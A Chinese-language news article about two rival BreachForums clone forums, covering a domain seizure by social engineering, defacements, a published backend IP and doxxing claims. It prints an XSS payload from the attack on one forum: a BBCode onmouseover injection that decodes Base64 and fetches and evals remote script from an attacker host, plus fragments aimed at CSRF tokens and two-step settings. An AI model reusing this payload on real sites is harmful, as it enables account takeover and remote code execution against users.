真假美猴王：两个重启启动的新BreachForums暗网论坛的战争正在打响

自从多次重启后的BreachForums论坛被FBI查封之后，暗网先后出现了两个名为BreachForums的论坛，一个是Indra的BreachForums[.]bf（管理员Indra与N/A），一个是Hasan的BreachForums[.]cz（管理员HasanBroker与breach3d）。这两个论坛的诞生注定会硝烟四起，BreachForums克隆论坛之间的一场战役正在打响。

“暗网下/AWX”此前跟踪报道，Indra的BreachForums[.]bf于2025年12月诞生，使用MyBB搭建，通过投放.fr域名数据库并伪造政府邮箱宣布论坛成立，宣称自己才是真正的官方BF论坛；Hasan的BreachForums[.]cz于2026年1月出现，使用XenForo搭建，称自己才是正统，目前已吸引逾1400名成员加入。

近期，这两个BreachForums论坛的战争进入了白日化阶段，先是BreachForums[.]bf域名被社会工程学攻击后被暂停，其次BreachForums[.]cz论坛也遭受了短时间的跨站脚本（XSS）漏洞攻击，整体而言，Hasan的BreachForums[.]cz略占上风。

BreachForums[.]bf域名丢失后又被找回

2月3日，BreachForums[.]bf域名突然被域名注册商暂停访问，其管理员N/A发布公告，紧急启动BreachForums[.]jp域名来替代访问。同时，Hasan在BreachForums[.]cz发布主题“Takedown of the Fake Clone”（拿下仿冒克隆），并表示正在使用SQL注入、跨站脚本、SSRF请求等诸多漏洞进行攻击。

2月8日，访问BreachForums[.]bf，显示异常的篡改消息以及倒计时，暗示该平台可能遭遇安全事件或系统入侵。界面显示了以下内容：公开倒计时、泄露的个人图像、提及涉嫌犯罪活动及执法部门的签名声明、与论坛常规运营通知无关的声明。

根据暗网研究专家IntelOps（@IntelOpsV3）发布的消息，有黑客窃取某西非国家政府邮箱后，通过社会工程手段诱使域名注册商暂停了BF域名。域名注册商将技术援助请求转交布基纳法索的ABDI机构作为主管当局寻求协助，但技术援助集体成功推动其采取行动。

据称，Hasan在该域名被删除后成功注册该域名，并在2月8日发布了篡改页面。但Indra最终说服注册商该举报属虚假信息，重新夺回BreachForums[.]bf域名控制权，并发布公告恢复该域名的使用。

BreachForums[.]cz网站被篡改后快速恢复

2月5日，BreachForums[.]cz网站曾遭遇了一次跨站脚本（XSS）漏洞攻击，短暂遭到篡改，疑似因为XenForo存在跨站脚本漏洞。Hasan发帖解释，该XSS漏洞可利用性源于XenForo解析BBcode的机制，属于原生漏洞即零日漏洞。

该Payload利用JavaScript的eval函数实现Base64编码的解码功能（部分依赖混淆性安全机制）。通过atob函数解码后，得到以下在鼠标悬停时触发的JavaScript有效载荷：

(async() => {
var u = "https://breachforums.pathetic.wtf/server.php?get=payload";
var r = await fetch(u);
var t = await r.text();
eval(t);
})()

Payload如下：

'c': ['https://breachforums.pathetic.wtf/server.php', "[table width=\"100%' onmouseover='eval(atob(&quot;KGFzeW5jKCk9PnsgICAgIHZhciB1ID0gImh0dHBzOi8vYnJlYWNoZm9ydW1zLnBhdGhldGljLnd0Zi9zZXJ2ZXIucGhwP2dldD1wYXlsb2FkIjsgICAgIHZhciByID0gYXdhaXQgZmV0Y2godSk7ICAgICB2YXIgdCA9IGF3YWl0IHIudGV4dCgpOyAgICAgZXZhbCh0KTsgfSkoKQ==&quot;))'\"] [tr][td]click here and you will be entered into the giveaway[/td][/tr] [/table]", 0x1, "credits giveawayy", 0x0, 0x1964, 'setTimeout', 0x2, "\n<head>\n  <meta charset=\"utf-8\">\n  <title>owned</title>\n  <style>\n    body { margin: 0; padding: 0; height: 100vh; background: #000; color: #ff00aa; font-family: 'Courier New', Courier, monospace; display: flex; align-items: center; justify-content: center; text-align: center; overflow: hidden; }\n    .container { max-width: 90%; padding: 15px; line-height: 1.3; }\Two-step verification is enabled", 'includes', 'Disable', 'ON', 'OFF', 'tf', 'POST', 'method', 'no-cors', 'mode', 'JSON', 'stringify', 'body', 'onmouseover', 'text/html', 'parseFromString', 'FormData', "textarea[name=\"signature_html\"]", 'querySelector', 'signature_html', "\n\n", 'append', '_xfToken', '_0x56bbbd$$2', 'title', 'message_html', "<p>Please read this important announcement regarding your account security.</p>", '_0x2442b2$$2', '_0x30305c$$1', 'message', 'err']

Hasan公布了BreachForums[.]jp背后的服务器IP信息

Hasan称追踪到BreachForums[.]jp的后端IP地址，他们把服务器托管在DDoS防护服务商那里，意味着BreachForums[.]jp的后端IP已经泄露，但无法确认是否是目前BreachForums[.]bf的后端IP。Hasan公布的IP是：186.2.165.88

该IP位于迪拜/阿拉伯联合酋长国，因此DDoS-Guard本身也使用该主机托管服务而非自主部署。
他们采用IQWEB主机服务。

Hasan还表示，BreachForums[.]bf的用户正面临来自阿联酋主机的威胁，因为阿联酋与美国及其他西方国家签订了司法互助协议。

BreachForums[.]cz一名管理员breach3d身份被人肉，但其否认

BreachForums[.]bf称，Hasan的BreachForums[.]cz论坛的共同所有者breach3d的真实身份被人肉出为美国佛罗里达州的Thomas。

但breach3d对此声明予以否认。breach3d是ShinyHunters组织成员，亦自称已退出LAPSUS$组织。

此前，breach3d进行的分析揭露了BreachForums[.]bf存在严重且系统性的安全漏洞。

breach3d发帖称BreachForums[.]bf被发现存在关键性SSRF（服务器端请求伪造）漏洞，且其帖子创建接口完全缺乏速率限制机制。该漏洞源于对BBCode图片标签img的疏忽处理。服务器在未进行充分验证的情况下处理用户控制的外部URL，同时对帖子创建端点的POST请求几乎未设任何限制。

breach3d表示调查过程中发现的漏洞可收集IP相关信息，这与BreachForums[.]bf反复宣称“不记录用户IP”的说法直接矛盾，且证据强烈表明第三方已试图获取并保留这些数据以备后用。